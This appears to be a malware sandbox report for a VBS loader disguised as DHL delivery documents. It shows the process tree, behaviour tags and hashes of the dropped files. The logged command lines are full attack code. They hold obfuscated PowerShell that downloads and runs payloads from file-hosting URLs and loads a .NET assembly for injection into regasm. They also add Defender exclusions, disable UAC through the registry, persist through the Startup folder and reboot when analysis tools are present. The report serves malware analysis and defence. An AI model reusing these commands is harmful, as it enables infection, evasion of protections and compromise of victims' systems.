'sAGkAZgAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + 'kAGIAaw' + [char]66 + 'xAHQAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'ZAE4ASw' + [char]66 + 'iAGYAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'ZAE4ASw' + [char]66 + 'iAGYAJA' + [char]66 + '7ACAAKQAgAFoAWg' + [char]66 + 'rAFQATAAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 
+ 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAFoAWg' + [char]66 + 'rAFQATAAkACAAOwA=';$wfdyx = $wfdyx.replace('的杰是' , 'B') ;;$fjptf = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $wfdyx ) ); $fjptf = $fjptf[-1..-$fjptf.Length] -join '';$fjptf = $fjptf.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\awb_post_dhl_delivery_documents_pdf.vbs');powershell $fjptf
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3140
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$tqkbd = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$tqkbd = $menos ;}else {$tqkbd = ($tqkbd) ;};$nnrjk = (New-Object Net.WebClient);$nnrjk.Encoding = [System.Text.Encoding]::UTF8;$nnrjk.DownloadFile( $tqkbd, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\awb_post_dhl_delivery_documents_pdf.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$hdvzj = ('https://www.pastery.net/rdakwa/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$TWzsU = $webClient.DownloadString( $hdvzj ) ;$Stringbase = $TWzsU; $TWzsU = BaseMy;$TWzsU | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$PeMzb = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$kMFIR = New-Object System.Net.WebClient ;$kMFIR.Encoding = [System.Text.Encoding]::UTF8 ;$IPgJD = ( Get-Content -Path $cZNqf ) ;$TlTKl = $kMFIR.DownloadData( $IPgJD ) ;$SkzeD = [System.Text.Encoding]::UTF8.GetString($TlTKl);$SkzeD | Out-File 
-FilePath $PeMzb -force ;$REyyw = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$REyyw += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$REyyw += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$REyyw += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$REyyw += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''nib.smrafmaerts/segami/moc.tithgisnihtworg//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\awb_post_dhl_delivery_documents_pdf.vbs'' , ''D D1Dc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$REyyw | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1404
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1608
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\Admin\AppData\Local\Temp\DLL01.txt"
            5⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:2304
            • C:\Windows\system32\PING.EXE
              ping 127.0.0.1 -n 1
              6⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:4144
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\Admin\AppData\Local\Temp\DLL02.txt"
            5⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:2452
            • C:\Windows\system32\PING.EXE
              ping 127.0.0.1 -n 1
              6⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2952
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\Admin\AppData\Local\Temp\DLL31.ps1"
            5⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:4748
            • C:\Windows\system32\PING.EXE
              ping 127.0.0.1 -n 1
              6⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:4620
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
            5⤵
              PID:3552
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell $S = 'C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:400
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ;
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3772
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /k reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4284
              • C:\Windows\system32\reg.exe
                reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                6⤵
                • UAC bypass
                • Modifies registry key
                PID:4592
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\hmpht.ps1'"
              5⤵
              • Hide Artifacts: Hidden Window
              • Suspicious use of WriteProcessMemory
              PID:4484
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\hmpht.ps1'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1056
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\hmpht.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4620
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1'"
              5⤵
              • Hide Artifacts: Hidden Window
              • Suspicious use of WriteProcessMemory
              PID:4920
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2728
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4996
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\luwne.ps1"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2596
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\uwsqd.ps1"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3776
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2472
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1404
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1776
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3580
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5032
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4604
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:828
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:760
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1688
              • \??\c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
                #by-unknown
                6⤵
                  PID:976
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\awb_post_dhl_delivery_documents_pdf.vbs"
                5⤵
                  PID:1436

        Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\hmpht.ps1

          Filesize

          432B

          MD5

          8b27d20313e042eb053f98cfa5e3cb6e

          SHA1

          652121975c6e235e7f846a801904b1f33ab37297

          SHA256

          6b9cafdc2aca58065081d6b2591f17734ca24a2762b77c6c642284ab88af2709

          SHA512

          6eecaadeb529c4bb4ed58b38440d4daf9bf572f2d41d24b4da6bdcffe19cadf413b05ea92e5a5aa04c1532f690a75212a2c93d99d0003fa5335c59cbe80d8b75

        • C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\luwne.ps1

          Filesize

          213KB

          MD5

          3c7cea596704106858bb5dc1d3a05d87

          SHA1

          4e4dc571a3175ed2d76c0921dd0ff5ea9eee08f2

          SHA256

          b0f6e6dfdd08b69bc3c6c05c92bd4e0efbb5e8e501026f6165e8a0672b8866c8

          SHA512

          8be329c571f8a66c91b3e6af0bf51112d4196150c97eb69534e65a6bcc75be93686c9c2602327b6627faa45b430f5ba1e7fbb1ab8d7f6fc3622c335abddf1d0c

        • C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1

          Filesize

          437B

          MD5

          7a89f3af3d2127475350a816b6c95ae8

          SHA1

          1502e26078e599561d9e4329e014fd244a41dc77

          SHA256

          72a84238e456e3d7f4bb215fc96a518aa37a257946992a0b6ee3fc46fcbcdb12

          SHA512

          e64fa5a9a9be7c48ff3a5afc4c322b5fef8d80d242b6ac906e1a03190ef2e07d3c78bdc05b75e77dd88104ce35f5436eac39448280a2bad0608c64a5c44df822

        • C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\uwsqd.ps1

          Filesize

          237B

          MD5

          c5037fdb930950210891bd9fa7572bf0

          SHA1

          f7dbfe484147489f63385ae4efb34a4fe8615316

          SHA256

          0cd5c8a5109ee51f23d50aee273f72b02c9ee9b4ca2abc6749856a80382f88c2

          SHA512

          992ebdd6367550126f2571fb3e8f7c95828413053822f3681172a06a98f69ea531f1a532a6eda2300114c3870ad7514994ec0d4b2d621d478c93fce82b144e6f

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          5caad758326454b5788ec35315c4c304

          SHA1

          3aef8dba8042662a7fcf97e51047dc636b4d4724

          SHA256

          83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

          SHA512

          4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          1bad2704664b4c1a190586ec492be65f

          SHA1

          1c98e6645c66774152c184d23f7a3178ce522e7b

          SHA256

          5950586396814b38bfdbb86757839fc8c7ce3eb73577775473c29ce6be81fe3e

          SHA512

          668553c12f1e5560baba826d5c8b139d7c7e323b6aa4e3723aaca479850f898c147d63cb77d305d715044db1e75cf501d6502ca214c7ed05ded424b230893bb0

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          04c9ebf9c23c1d4d4a08c16e20fcceed

          SHA1

          67044e3f04584acefef2e09c2584e22e70fc5df4

          SHA256

          5ba65623b2739407ddd1fa8d75335ee54a3575893bc6a226182972c1ef881e58

          SHA512

          84cf13081ef3162995557677cfdae002ab7af81cf53ca874fbb046aa26facc375f8b533e6d2899240b3bdb06d26c6b322b60c4eca9a2a9570c54ba6d0350cd69

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          3db5a3b556b01c59c5812cb86abb674e

          SHA1

          3848e5419d5c47879f159247e4f1b08005674cf0

          SHA256

          218d487f881ce9640acd16f7476b445471b83671569e99973f77d0bbf6c42ffa

          SHA512

          3eb6575d3e476053a65b2631b0cd0d584056ca476058ee2706c69fe10b0502460c40f8985f1f4666e42fba2809924f6dc34ba2e9b2629217542e45cb3640adcd

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          7224298af316ab030a6ea7b29e69915d

          SHA1

          c73b3f8af0647472461d4746f9edf2153b754bd0

          SHA256

          c869d981719dc133b2e2dba5cfc9925ce9b327dbf079a18b8b6caa77716e1f87

          SHA512

          5ae6512f693439759dfc913af7db37395fba2216c1b87bf5b6788a39f01a7c22f6daac0c2ccb680c552d431ed5806a344358a2e1856045a2efad43f0059ad099

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          e89e47688c3779545d80ee22d365b25d

          SHA1

          6727b4dc28b3299596617a798ff935bf56bfe499

          SHA256

          c50db088a82cda38d32e2cdb5dae74404413a9c1aaa487e02a83cfd5cd2c17f4

          SHA512

          d32ba781b28b21e70fea3e1934fd9a6d45d6a9724c72f9beeb8c445ffe8a94aad370456b61150e9bc4c51a5796c048e77d556ec0b30b21a02bdd5bd78b0c06ff

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          1536159346e9a2061e905bb38ac9fd35

          SHA1

          eff17db4721dc0add117ed399b839130d27675d4

          SHA256

          6b0eebfc544130c7a8f7d0e45c8e0b86748c13b528bc9948f216a76d8be2b88f

          SHA512

          fab6f66ac2bc68e2a82199da2519c7aae2d629603450175b69336097111e57f49fbea8b3903f7a106150032d8e5c653a90f681a10d7be668bff2bcdb798eb4ee

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          693baf43e3d5fefa0883380c7a77c69a

          SHA1

          f3e6115432504e8bd401d8c0ff2da43e708707e5

          SHA256

          27a3015931d1f72ce982cf8f9d38dc99219ea2bb9bda4ec7b09dca9bd1122e9e

          SHA512

          29c5e093f3f86c38246fe5f1c5d6110f315937916f139289f52dbbb1e67d4f5f46e4cc928ff03ce19b91cf1d8310d40dadc65812399829da8c94f0c6f9e3f5cc

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          ac3bf9756600f6c31a15240716e6e7c6

          SHA1

          521aa76b55f74cafd1b579933dc0fae439acb0f5

          SHA256

          f7bc65b2962543bb5165f2b1bb6b3390ed3b55801475b2fd7701129cc8a081fd

          SHA512

          96ae0dddaeadae05fed313707076af5d443d328d2ea8524aa283812591b615b596a0aab1d2918471aba59f5546cebca7521bd2003db63a24f548899bee5fa67a

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          d49246229b2077d7961ee5c90e0945f8

          SHA1

          8b50bbdbc82b00f545510bc3ea9e8cd96182fa79

          SHA256

          581ef2752ddb123bff535eebcf573a4783ada1f4b7f7250c4145902a2de5dd8c

          SHA512

          5069555ffc7a217c703186559ed399e5fd8e787443be1d6bf9b6b96faca2565fb1c898422bdde51aadd6359ebf65ae40d4509b2829c5f6bb64d597b3b4763148

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          a68fcc3482ebb381cd7eb80d4dfc7ac9

          SHA1

          68f694b1b7999996678244d8ef9d95f520ec2e39

          SHA256

          1bfbb143c70207d28f8266d08a28e052467ad0eab48c65c19ba8636d44093ea0

          SHA512

          a8a5cc66e81ebb417dcd216541690a31913f8a9cbe676b76ac451c009540ef33558dba762da1736c0f61fb36dfaa71f0926ac1ab8919a892a8ab49087999a2d8

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          77d622bb1a5b250869a3238b9bc1402b

          SHA1

          d47f4003c2554b9dfc4c16f22460b331886b191b

          SHA256

          f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

          SHA512

          d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          d8b9a260789a22d72263ef3bb119108c

          SHA1

          376a9bd48726f422679f2cd65003442c0b6f6dd5

          SHA256

          d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

          SHA512

          550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          63f3daf3ebf7daaa3416a431d50ff3b2

          SHA1

          cd95e25992a7da97a5cc8b48a47e157867721a04

          SHA256

          21927689c7ecab2b7af7611474c2e2b20d72d05a941afec01b42337f432dc2fa

          SHA512

          9f6e37a407af1b6fdeaa89f8753b5b7db087c32b3f9b2b2bd7af027ec3606ab534ad7dc16e179e3e784c04af27cd77befd45d4ef68c2d1af09830b311177f29f

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          948B

          MD5

          726aa601c9849abb13db145101d49983

          SHA1

          16a700814154dc40e5ed2a594a56981f0db1e9e2

          SHA256

          1ce61179899cbad68ae358a04f43020aee038a2fde601155f31efd57cfd8b793

          SHA512

          8858793a9d550403a680184129151cb2fcc9b56180811be3cdeb4108ce9ecf65de2e6c3f3edd2cd90ce7d33bd44ee7b219585d4ed98ac1ebd287c8d9e4cf1f6a

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cdkyjvfv.bsz.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

